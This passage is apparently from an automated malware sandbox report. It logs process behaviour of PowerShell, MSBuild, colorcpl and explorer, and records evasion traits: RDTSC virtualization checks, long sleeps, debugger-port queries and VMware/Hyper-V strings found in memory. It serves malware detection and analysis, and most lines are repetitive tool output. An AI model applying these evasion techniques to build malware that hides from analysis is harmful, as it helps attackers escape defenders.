            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 2F39904 second address: 2F3990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 2F39B6E second address: 2F39B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00409AA0 rdtsc 5_2_00409AA0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1258Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1961Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5194Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4510Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 886Jump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeWindow / User API: threadDelayed 9837Jump to behavior
            Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_6-13789
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI coverage: 1.9 %
            Source: C:\Windows\SysWOW64\colorcpl.exeAPI coverage: 2.4 %
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5756Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6360Thread sleep count: 5194 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7112Thread sleep count: 4510 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5316Thread sleep time: -17524406870024063s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exe TID: 4888Thread sleep count: 134 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exe TID: 4888Thread sleep time: -268000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exe TID: 4888Thread sleep count: 9837 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exe TID: 4888Thread sleep time: -19674000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\colorcpl.exeLast function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: explorer.exe, 00000006.00000000.1812503144.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: explorer.exe, 00000006.00000002.2934766401.00000000078A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
            Source: explorer.exe, 00000006.00000002.2938230118.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
            Source: explorer.exe, 00000006.00000000.1812503144.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: explorer.exe, 00000006.00000000.1789968417.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
            Source: explorer.exe, 00000006.00000000.1798545564.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000006.00000000.1812503144.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
            Source: explorer.exe, 00000006.00000000.1798545564.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
            Source: explorer.exe, 00000006.00000002.2938230118.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
            Source: wscript.exe, 00000000.00000003.1668064506.000001D6672C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665681229.000001D6672C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1668064506.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D6672C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672069511.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672124633.000001D6672C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D667270000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1670550299.000001D6672C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1807070242.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2938230118.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2938230118.00000000097D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: wscript.exe, 00000000.00000003.1668064506.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672069511.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D667270000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn
            Source: explorer.exe, 00000006.00000000.1812503144.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
            Source: explorer.exe, 00000006.00000002.2934766401.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1798545564.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
            Source: explorer.exe, 00000006.00000002.2938230118.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
            Source: explorer.exe, 00000006.00000000.1789968417.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
            Source: explorer.exe, 00000006.00000000.1789968417.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00409AA0 rdtsc 5_2_00409AA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0040ACE0 LdrLoadDll,5_2_0040ACE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137B136 mov eax, dword ptr fs:[00000030h]5_2_0137B136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137B136 mov eax, dword ptr fs:[00000030h]5_2_0137B136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137B136 mov eax, dword ptr fs:[00000030h]5_2_0137B136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137B136 mov eax, dword ptr fs:[00000030h]5_2_0137B136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01414144 mov eax, dword ptr fs:[00000030h]5_2_01414144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01414144 mov eax, dword ptr fs:[00000030h]5_2_01414144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01414144 mov ecx, dword ptr fs:[00000030h]5_2_01414144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01414144 mov eax, dword ptr fs:[00000030h]5_2_01414144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01414144 mov eax, dword ptr fs:[00000030h]5_2_01414144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01381131 mov eax, dword ptr fs:[00000030h]5_2_01381131
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01381131 mov eax, dword ptr fs:[00000030h]5_2_01381131
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01455152 mov eax, dword ptr fs:[00000030h]5_2_01455152
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01418158 mov eax, dword ptr fs:[00000030h]5_2_01418158
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013B0124 mov eax, dword ptr fs:[00000030h]5_2_013B0124
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01419179 mov eax, dword ptr fs:[00000030h]5_2_01419179
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137F172 mov eax, dword ptr fs:[00000030h]5_2_0137F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137F172 mov eax, dword ptr fs:[00000030h]5_2_0137F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137F172 mov eax, dword ptr fs:[00000030h]5_2_0137F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137F172 mov eax, dword ptr fs:[00000030h]5_2_0137F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137F172 mov eax, dword ptr fs:[00000030h]5_2_0137F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137F172 mov eax, dword ptr fs:[00000030h]5_2_0137F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137F172 mov eax, dword ptr fs:[00000030h]5_2_0137F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137F172 mov eax, dword ptr fs:[00000030h]5_2_0137F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137F172 mov eax, dword ptr fs:[00000030h]5_2_0137F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137F172 mov eax, dword ptr fs:[00000030h]5_2_0137F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137F172 mov eax, dword ptr fs:[00000030h]5_2_0137F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137F172 mov eax, dword ptr fs:[00000030h]5_2_0137F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137F172 mov eax, dword ptr fs:[00000030h]5_2_0137F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137F172 mov eax, dword ptr fs:[00000030h]5_2_0137F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137F172 mov eax, dword ptr fs:[00000030h]5_2_0137F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137F172 mov eax, dword ptr fs:[00000030h]5_2_0137F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137F172 mov eax, dword ptr fs:[00000030h]5_2_0137F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137F172 mov eax, dword ptr fs:[00000030h]5_2_0137F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137F172 mov eax, dword ptr fs:[00000030h]5_2_0137F172
